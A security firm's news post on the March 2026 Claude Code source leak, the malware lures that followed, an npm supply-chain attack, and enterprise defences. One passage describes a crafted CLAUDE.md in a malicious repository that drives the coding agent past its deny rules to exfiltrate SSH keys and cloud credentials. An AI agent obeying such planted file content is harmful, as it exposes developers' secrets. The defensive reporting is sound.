When AI tools become attack vectors:
The Claude code leak and what followed

7th April 2026NewsAJ Thompson

Are you ready to get in touch?

Request a Call back

In March 2026, Anthropic’s Claude Code source leak became a headline‑grabbing example of just how vulnerable modern AI development tools can be. Within hours, attackers weaponised curiosity around the leak to deploy malware and expose flaws, a chain reaction that highlights why AI coding agent security must now be treated as an enterprise‑level priority.

A packaging mistake that exposed AI coding agent security risks

The last week of March 2026 delivered a stark reminder that in the race to ship AI products at speed, even the most sophisticated technology companies are not immune to basic human error and that attackers are watching, ready to exploit the fallout within hours.

On 31 March 2026, Anthropic accidentally published the full client-side source code of Claude Code, its flagship terminal-based AI coding agent, through a packaging mistake in its public npm release. A 59.8 MB JavaScript source map file was inadvertently bundled into version 2.1.88 of the @anthropic-ai/claude-code package, exposing approximately 513,000 lines of unobfuscated TypeScript across nearly 2,000 files. Security researcher Chaofan Shou spotted the issue and flagged it publicly on X within hours, triggering a global scramble by developers, researchers, and threat actors to download, mirror, and analyse the code.

Anthropic moved quickly to confirm the incident, stating that this was a release packaging issue caused by human error, not a security breach, and that no sensitive customer data or credentials were involved. But while the company’s response was measured, the downstream consequences were anything but.

Infographic detailing AI coding agent security risks, the Claude Code source leak, malware threats like Vidar and GhostSocks, and cybersecurity safeguards for developer environments

How hackers turned a packaging error into a malware campaign

What happened next illustrates a pattern that every IT and security leader should understand: the moment a high-profile technology event generates public curiosity, threat actors pivot to exploit that curiosity as a lure.

Within hours of the leak becoming public, malicious GitHub repositories appeared claiming to offer the leaked Claude Code, complete with promises of unlocked enterprise features and no usage restrictions.

Zscaler’s ThreatLabz research team identified the campaign. A repository optimised for search engine discovery appeared at the top of Google results for searches including “leaked Claude Code” and “Claude Code source download.” Curious developers who clicked through were not receiving Anthropic’s source code — they were executing a Rust-based dropper named ClaudeCode_x64.exe that deployed two distinct malware payloads:

  • Vidar: a commodity infostealer capable of harvesting browser credentials, saved passwords, and cryptocurrency wallet data
  • GhostSocks: proxy malware that conscripts infected machines into residential proxy infrastructure, giving attackers a way to mask their activity through compromised devices

A second repository, linked to the same threat actor operating under a different account, hosted identical payloads — a deliberate multi-channel distribution strategy designed to maximise reach before takedown.

A compounding AI security crisis

The malware campaign was not the only consequence. Security researchers at Adversa AI disclosed a critical vulnerability in Claude Code’s permission system, made far easier to exploit by the leaked source. The flaw allows a crafted CLAUDE.md file in a malicious repository to generate a pipeline of over 50 subcommands, at which point Claude Code’s deny rules, security validators, and command injection detection are entirely bypassed. Attackers could silently exfiltrate SSH keys, AWS credentials, GitHub tokens, and environment secrets from a developer’s workstation simply by having the agent open a specially crafted project.

Separately, a supply chain attack on the Axios npm package coincided almost exactly with the Claude Code leak. Developers who updated via npm on 31 March between 00:21 and 03:29 UTC may have inadvertently pulled a trojanised HTTP client containing a cross-platform remote access trojan. Security teams are strongly advised to rotate all secrets for any workstations that updated Claude Code during that window.

What enterprise IT leaders must do now

For organisations deploying AI coding agents, this incident should serve as a catalyst for a frank assessment of developer toolchain security. AI agents with local shell access and the ability to execute scripts represent a fundamentally different risk profile to traditional software. When those agents interact with external repositories, the attack surface expands considerably.

At Northdoor, we work with enterprise clients to ensure that the speed of AI adoption does not outpace the security controls needed to protect it.

Three principles should now be non-negotiable:

  1. Developer workstations must be treated as privileged endpoints — not general-purpose machines
  2. AI agents with shell execution capabilities must operate within Zero Trust architecture — with explicit permission boundaries and behavioural monitoring
  3. Any code claiming to be a leaked or unlocked version of a proprietary tool must be verified against official, signed sources only — no exceptions

The gap between vendor mistake and active attack has never been narrower

The Claude Code leak is a story about speed. In 2026, threat actors do not need to discover vulnerabilities independently — they need only monitor the news cycle and move faster than defenders. Anthropic acknowledged the error and committed to preventing a recurrence, but the malware campaigns, supply chain attack, and newly disclosed vulnerabilities that followed are a reminder that the consequences of an exposure can outlast the original incident by weeks.

For IT leaders, the lesson is not to avoid AI tools — the productivity gains are real and significant. The lesson is to ensure that the governance, monitoring, and access controls surrounding those tools are as sophisticated as the tools themselves.

If your organisation is deploying AI coding agents and has not yet reviewed your developer workstation security posture, speak to the Northdoor team about where to start.

Frequently Asked Questions (FAQs)

What caused the Claude code source code leak and was customer data affected?

On 31 March 2026, Anthropic accidentally published the client-side source code for Claude Code (version 2.1.88) due to a packaging error in its npm release process. A large JavaScript source map file was inadvertently included, exposing substantial amounts of unobfuscated TypeScript. Anthropic confirmed this was a release mistake rather than a security breach and that no customer data or credentials were compromised.

Is it safe to download the “leaked” code to study it?

No. As soon as the leak became public, malicious repositories appeared claiming to host the source code. These were used to distribute malware, including infostealers and proxy malware. Developers should only download tools from official, signed sources.

Can a source code leak lead to a direct hack of my computer?

Yes. Security researchers demonstrated that flaws in permission handling within the tool could be exploited using a specially crafted repository. This could allow attackers to bypass security checks and extract sensitive data such as SSH keys, cloud credentials, and tokens from the environment where the agent was running.

How do source code leaks like this typically happen in developer tools?

They are usually caused by packaging mistakes or release misconfigurations. For example, unintentionally including source map files or debug artefacts in a public build can expose proprietary code.

What should organisations do to reduce the risk from AI coding agents?

AI coding agents with shell access should be treated as privileged software. Organisations should:

  • Treat developer workstations as privileged endpoints
  • Apply Zero Trust principles with strict permission boundaries
  • Monitor agent behaviour and repository interactions
  • Only allow tools from verified, signed sources

How can companies protect themselves from these types of supply chain risks?

Organisations should adopt a Zero Trust approach for AI tools with shell access. This includes strict permission boundaries and behavioural monitoring. Developer workstations should be treated as privileged endpoints and secured to a higher standard than typical office devices.

Post-mortem of the March 2026 Claude code leak and the compounding security crisis it triggered

Click here to read more 

Our Awards & Accreditations